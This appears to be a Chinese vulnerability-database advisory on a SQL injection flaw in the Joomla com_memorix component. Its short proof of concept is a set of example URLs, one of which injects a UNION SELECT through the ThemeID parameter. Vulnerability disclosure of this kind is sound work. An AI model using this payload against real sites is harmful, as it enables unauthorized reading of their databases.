Joomla com_memorix组件SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

* 1. Description > Normal user can inject sql query in the url which lead to read data from the database. * 2. Proof of Concept > http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594 (SQLI) * Injected column is # 3 > http://www.example.com/index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222

0%
暂无可用Exp或PoC
当前有0条受影响产品信息